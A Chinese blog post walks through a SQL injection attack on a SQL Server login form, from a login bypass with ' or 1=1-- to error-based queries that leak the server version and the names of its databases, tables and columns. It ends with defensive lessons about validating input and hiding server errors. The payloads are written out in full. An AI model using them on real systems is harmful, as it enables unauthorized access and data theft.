分享一个SQL注入的实例过程
技术百科
零下一度
发布时间:2017-05-17
浏览: 次 SQL注入有很大的危害,这篇文章就记录了一个SQL注入的实例全过程,大家来看看他的危害到底有多大。
初步注入--绕过验证,直接登录
公司网站登陆框如下:
可以看到除了账号密码之外,还有一个公司名的输入框,根据输入框的形式不难推出SQL的写法如下:
SELECT * From Table WHERE Name='XX' and Password='YY' and Corp='ZZ'
我发现前两者都做一些检查,而第三个输入框却疏忽了,漏洞就在这里!注入开始,在输入框中输入以下内容:
用户名乱填,密码留空,这种情况下点击登录按钮后竟然成功登录了。我们看一下最终的SQL就会找到原因:
SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp='' or 1=1--'
从代码可以看出,前一半单引号被闭合,后一半单引号被 “--”给注释掉,中间多了一个永远成立的条件“1=1”,这就造成任何字符都能成功登录的结果。而Sql注入的危害却不仅仅是匿名登录。
中级注入--借助异常获取信息。
现在我们在第三个输入框中写入:“‘ or 1=(SELECT @@version) –”。如下:
后台的SQL变成了这样:
SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp='' or 1=(SELECT @@VERSION)--'
判断条件变成了 1=(SELECT @@VERSION),这个写法肯定会导致错误,但出错正是我们想要的。点击登录后,页面出现以下信息:
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (SP3) - 10.0.5500.0 (X64) Sep 21 2011 22:45:45 Copyright (c) 1988-2008 Microsoft Corporation Developer Edition (64-bit) on Windows NT 6.1(Build 7601: Service Pack 1) ' to data type int.
可怕的事情出现了,服务器的操作系统和SQL Server版本信息竟然通过错误显示出来。
危害扩大--获取服务器所有的库名、表名、字段名
接着,我们在输入框中输入如下信息:“t' or 1=(SELECT top 1 name FROM master..sysdatabases where name not in (SELECT top 0 name FROM master..sysdatabases))--”,此时发现第三个输入框有字数长度的限制,然而这种客户端的限制形同虚设,直接通过Google浏览器就能去除。
点击登录,返回的信息如下:
Conversion failed when converting the nvarchar value 'master' to data type int.
数据库名称“master”通过异常被显示出来!依次改变上面SQL语句中的序号,就能得到服务器上所有数据库的名称。
接着,输入信息如下:“b' or 1=(SELECT top 1 name FROM master..sysobjects where xtype='U' and name not in (SELECT top 1 name FROM master..sysobjects where xtype='U'))--”
得到返回信息如下:
Conversion failed when converting the nvarchar value 'spt_fallback_db' to data type int.
我们得到了master数据库中的第一张表名:“spt_fallback_db”,同上,依次改变序号,可得到该库全部表名。
现在我们以“spt_fallback_db”表为例,尝试获取该表中所有的字段名。在输入框中输入以下代码:“b' or 1=(SELECT top 1 master..syscolumns.name FROM master..syscolumns, master..sysobjects WHERE mas
ter..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='spt_fallback_db');”
于是,得到错误提示如下:
"Conversion failed when converting the nvarchar value 'xserver_name' to data type int.";
这样第一个字段名“xserver_name”就出来了,依次改变序号,就能遍历出所有的字段名。
最终目的--获取数据库中的数据
写到这里,我们已知通过SQL注入能获取全部的数据库,表,及其字段,为了防止本文完全沦为注入教程,获取数据的代码就不再描述,而这篇文章的目的也已达到,SQL注入意味着什么?意味着数据库中所有数据都能被盗取。
当知道这个危害以后,是否还能有人对SQL注入漏洞置之不理?
结语
关于安全性,本文可总结出一下几点:
对用户输入的内容要时刻保持警惕。
只有客户端的验证等于没有验证。
永远不要把服务器错误信息暴露给用户。
除此之外,我还要补充几点:
SQL注入不仅能通过输入框,还能通过Url达到目的。
除了服务器错误页面,还有其他办法获取到数据库信息。
可通过软件模拟注入行为,这种方式盗取信息的速度要比你想象中快的多。
漏洞跟语言平台无关,并非asp才有注入漏洞而asp.net就没有注入漏洞,一切要看设计者是否用心。
【相关推荐】
1. 特别推荐:“php程序员工具箱”V0.1版本下载
2. 如何防止sql注入?介绍5种防止sql注入的方法
3. 分享五个著名的SQL注入漏洞扫描工具
4. 分享一篇使用SQL注入漏洞拖库的实例讲解
# 就能
# 都能
# 数据库中
# 第三个
# 几点
# 输入框
# 客户端
# 变成了
# 框中输入
# 字段名
相关栏目:
<?muma
$count = M('archives')->where(['typeid'=>$field['id']])->count();
?>
【
AI推广<?muma echo $count; ?>
】
<?muma
$count = M('archives')->where(['typeid'=>$field['id']])->count();
?>
【
SEO优化<?muma echo $count; ?>
】
<?muma
$count = M('archives')->where(['typeid'=>$field['id']])->count();
?>
【
技术百科<?muma echo $count; ?>
】
<?muma
$count = M('archives')->where(['typeid'=>$field['id']])->count();
?>
【
谷歌推广<?muma echo $count; ?>
】
<?muma
$count = M('archives')->where(['typeid'=>$field['id']])->count();
?>
【
百度推广<?muma echo $count; ?>
】
<?muma
$count = M('archives')->where(['typeid'=>$field['id']])->count();
?>
【
网络营销<?muma echo $count; ?>
】
<?muma
$count = M('archives')->where(['typeid'=>$field['id']])->count();
?>
【
案例网站<?muma echo $count; ?>
】
<?muma
$count = M('archives')->where(['typeid'=>$field['id']])->count();
?>
【
精选文章<?muma echo $count; ?>
】
相关推荐
- Win11搜索栏无法输入_解决Win11开始菜单搜
- Python对象比较与排序_集合使用说明【指导】
- Linux怎么查找死循环进程_Linux系统负载分
- Win11怎么打开旧版计算器_Win11恢复传统计
- 如何提升Golang程序I/O性能_Golang
- mac怎么看硬盘大小_MAC查看磁盘存储空间与文件
- Win10系统字体模糊怎么办_Windows10高
- Win11怎么设置默认邮件应用_Windows11
- Win11怎么更改输入法顺序_Win11调整语言首
- PHP cURL GET请求:正确设置请求头与身份
- Win10怎样安装Excel数据分析工具_Win1
- Golang如何遍历目录文件_Golang fil
- Win11怎么设置默认输入法 Win11固定中文输
- 如何使用Golang捕获测试日志_Golang t
- php和redis连接超时怎么办_phpredis
- 如何在Golang中使用container/hea
- 如何使用正则表达式批量替换重复的“-”模式为固定字
- Python爬虫项目实战教程_Scrapy抓取与存
- Win11触摸板没反应怎么办_开启Win11笔记本
- Windows蓝屏错误0x00000023怎么修复
- Windows蓝屏错误0x00000018怎么处理
- Win11如何设置鼠标灵敏度_Win11鼠标灵敏度
- 如何用正则与预处理高效拦截带干扰符的恶意域名
- php会话怎么开启_session_start函数
- c++如何用AFL++进行模糊测试 c++ Fuz
- Win11开机自检怎么关闭_跳过Win11开机磁盘
- Win11怎么关闭右下角弹窗_Win11拦截系统通
- Win11怎么看电池循环次数_Win11笔记本电池
- Linux如何挂载新硬盘_Linux磁盘分区格式化
- Win11怎么设置虚拟键盘_打开Win11屏幕键盘
- c++怎么实现高并发下的无锁队列_c++ std:
- 如何在网页无标准表格标签时高效提取结构化数据
- 如何在Golang中处理模块冲突_解决依赖版本不兼
- Win11用户账户控制怎么关_Win11关闭UAC
- 如何高效获取循环末次生成的 NumPy 数组最后一
- Windows10系统怎么查看运行时间_Win10
- c# F# 的 MailboxProcessor
- 用Python构建微服务架构实践_FastAPI与
- c++中的std::conjunction和std
- 如何使用Golang实现基本类型比较_Golang
- Python迭代器生成器进阶教程_节省内存与懒加载
- Win11截图快捷键是什么_Win11自带截图工具
- Win11怎么设置开机密码_Windows11账户
- Windows10系统怎么查看CPU温度_Win1
- Mac如何彻底清理浏览器缓存?(Safari与Ch
- c++怎么编写动态链接库dll_c++ __dec
- Windows 11如何开启文件夹加密(EFS)_
- Win11怎么关闭自动调节亮度_Windows11
- Win11怎么关闭自动维护 Win11禁用系统自动
- Windows蓝屏错误0x0000002C怎么解决

QQ客服